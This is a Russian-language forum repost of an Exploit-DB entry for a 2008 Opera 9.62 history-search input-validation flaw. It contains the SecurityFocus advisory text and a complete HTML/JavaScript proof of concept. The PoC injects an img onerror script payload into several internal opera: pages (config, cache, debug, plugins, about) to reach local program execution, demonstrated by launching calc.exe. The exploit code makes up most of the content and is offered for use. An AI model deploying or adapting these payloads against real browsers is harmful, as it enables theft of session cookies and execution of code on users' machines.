Exploit Opera Web Browser 9.62 - History Search Input Validation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32555
Проверка EDB
  1. Пройдено
Автор
NEOCODERZ
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
null
Дата публикации
2008-10-31
HTML:
source: https://www.securityfocus.com/bid/32015/info

Opera Web Browser is prone to an input-validation vulnerability because of the way it stores data used for the History Search feature.

Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, obtain sensitive information, alter the browser's configuration settings, or execute local programs in the context of the browser; other attacks are also possible.

Opera Web Browser 9.62 is vulnerable.

<!-- # OPERA 9.62 Remote Code Execution # Vulnerability Found By NeoCoderz # Email : NeoCoderz1[at]msn[dot]com --> <html> <script> function execcalc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalc()">Click me...(opera:config)</a><br> <script> function execcalca() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br> <script> function execcalcb() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br> <script> function execcalcc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br> <script> function execcalcd() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br> </html>
 
Источник
www.exploit-db.com

Похожие темы